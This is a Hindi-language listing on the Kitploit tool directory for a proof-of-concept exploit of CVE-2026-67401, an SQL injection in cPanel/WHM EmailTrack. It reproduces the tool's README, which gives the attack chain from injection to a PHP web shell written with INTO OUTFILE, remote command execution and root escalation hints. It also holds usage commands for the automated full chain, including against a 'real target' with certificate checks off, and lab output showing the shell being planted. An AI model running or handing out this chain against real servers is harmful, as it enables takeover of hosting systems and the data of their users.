Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-67401 — CVE-2026-67401 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, एक cPanel/WHM EmailTrack SQL इंजेक्शन जो मनमानी फ़ाइल लेखन और रूट RCE को सक्षम बनाता है, SQLi डिटेक्शन प्रोब और एक स्व-निहित भेद्य लैब के साथ। | Kitploit
उपकरण/GitHubGitHub/imbas007/cve-2026-67401
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubimbas007/cve-2026-67401

CVE-2026-67401

CVE-2026-67401 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, एक cPanel/WHM EmailTrack SQL इंजेक्शन जो मनमानी फ़ाइल लेखन और रूट RCE को सक्षम बनाता है, SQLi डिटेक्शन प्रोब और एक स्व-निहित भेद्य लैब के साथ।

रिपॉजिटरी देखें
3घं 59मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-67401 — cPanel/WHM EmailTrack SQL इंजेक्शन → रूट RCE

CVE Severity Platform Python

CVE-2026-67401 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, cPanel & WHM की EmailTrack कार्यक्षमता में एक गंभीर SQL इंजेक्शन भेद्यता जो मेल-संबंधित विशेषाधिकारों वाले प्रमाणित उपयोगकर्ता को मनमानी फ़ाइलें लिखने और रूट के रूप में कोड निष्पादित करने की अनुमति देती है।

खोजकर्ता: Ali Mustafa प्रकट किया गया: 8 सितंबर, 2026 घटक: EmailTrack (ईमेल डिलीवरी लॉगिंग / ट्रैकिंग)


प्रभावित संस्करण

ठीक किए गए बिल्ड से नीचे के संस्करण भेद्य हैं।

cPanel बिल्ड श्रृंखलाठीक किया गया संस्करण
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

अपना संस्करण इससे जाँचें:

root@kitploit:~
cat /usr/local/cpanel/version

एक्सप्लॉइट श्रृंखला

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. मेल विशेषाधिकार रखने वाले खाते के साथ cPanel में प्रमाणित करें।
  2. EmailTrack account पैरामीटर के माध्यम से इंजेक्ट करें।
  3. SELECT ... INTO OUTFILE के साथ public_html/ में एक PHP वेब शेल लिखें।
  4. शेल के माध्यम से कमांड निष्पादित करें।
  5. cPanel के SUID बाइनरी, cron, या टास्क क्यू के माध्यम से एस्केलेट करें।

रिपॉज़िटरी सामग्री

फ़ाइलविवरण
poc_sqli.pySQL इंजेक्शन डिटेक्शन: बूलियन-आधारित, समय-आधारित, और UNION कॉलम गणना
poc_full_chain.pyपूर्ण एक्सप्लॉइट श्रृंखला: SQLi → INTO OUTFILE वेब शेल → RCE → रूट मार्गदर्शन
lab/vuln_server.pyभेद्य EmailTrack बैकएंड का स्थानीय सिमुलेशन (सुरक्षित, स्व-निहित)
README.mdयह दस्तावेज़

बंडल किया गया लैब आपको वास्तविक cPanel सर्वर के बिना पूरी श्रृंखला चलाने और सत्यापित करने देता है।


आवश्यकताएँ

  • Python 3.8+
  • कोई तृतीय-पक्ष पैकेज नहीं — सब कुछ मानक लाइब्रेरी का उपयोग करता है।

उपयोग

सभी कमांड रिपॉज़िटरी रूट से चलाए जाते हैं।

1. स्थानीय लैब चलाएँ

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • क्रेडेंशियल: alice / s3cr1t
  • अनुकरण करता है: UAPI लॉगिन, भेद्य EmailTrack क्वेरी, SLEEP(), INTO OUTFILE, और PHP वेब-शेल निष्पादन।
  • तर्क 1: पोर्ट (डिफ़ॉल्ट 18123)
  • तर्क 2: डॉक्यूमेंट रूट (डिफ़ॉल्ट lab/htdocs)

इसे एक टर्मिनल में चलता रहने दें और PoC के लिए दूसरा टर्मिनल उपयोग करें।

2. SQL इंजेक्शन डिटेक्शन

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
तर्कविवरण
-H, --hostcPanel होस्ट, जैसे https://cp.example.com:2083
-u, --usernameमेल विशेषाधिकारों वाला cPanel खाता
-p, --passwordखाता पासवर्ड
--paramइंजेक्टेबल पैरामीटर (डिफ़ॉल्ट: account)
--modedetect (डिफ़ॉल्ट), boolean, timing, union, या all
--sleepटाइमिंग प्रोब के लिए SLEEP() अवधि (डिफ़ॉल्ट: 3.0)
--dump-versionUNION के माध्यम से DBMS संस्करण निकालने का प्रयास करें
--insecureTLS प्रमाणपत्र सत्यापन छोड़ें

एक विशिष्ट प्रोब चलाएँ:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. पूर्ण एक्सप्लॉइट श्रृंखला

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
तर्क / Envविवरण
host (positional)cPanel होस्ट, या env CPANEL_HOST सेट करें
CPANEL_USERमेल विशेषाधिकारों वाला cPanel खाता
CPANEL_PASSखाता पासवर्ड
--shell-baseबेस URL जो public_html को सर्व करता है (जहाँ वेब शेल तक पहुँचा जाता है)
--insecureTLS प्रमाणपत्र सत्यापन छोड़ें
--no-escalateRCE के बाद रुकें; रूट एस्केलेशन मार्गदर्शन छोड़ें
SHELL_NAME (env)वेब शेल फ़ाइल नाम (डिफ़ॉल्ट: .mail.cache.php)

स्वचालित रूप से निष्पादित चरण:

  1. cPanel में प्रमाणित करें
  2. SQL इंजेक्शन की पुष्टि करें (बूलियन + समय-आधारित)
  3. UNION के माध्यम से क्वेरी की कॉलम गणना निर्धारित करें
  4. SELECT ... INTO OUTFILE के साथ एक PHP वेब शेल लिखें
  5. शेल के माध्यम से कमांड निष्पादित करें (id, whoami, SUID गणना, …)
  6. रूट एस्केलेशन मार्गदर्शन प्रिंट करें (SUID whmapi1, cron, टास्क क्यू)

4. वास्तविक लक्ष्य के विरुद्ध

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

नोट: डिफ़ॉल्ट --shell-base होस्ट से cPanel-केवल पोर्ट (2082/2083) हटा देता है। यदि डॉक्यूमेंट रूट किसी भिन्न पोर्ट पर सर्व किया जाता है, तो इसे स्पष्ट रूप से सेट करें।


सत्यापित परिणाम

बंडल किए गए लैब के विरुद्ध उत्पन्न आउटपुट:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

संदर्भ

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

लाइसेंस

शैक्षिक और अधिकृत सुरक्षा-अनुसंधान उद्देश्यों के लिए जारी किया गया। उपयोग से पहले अस्वीकरण देखें।

टूल डाउनलोड करें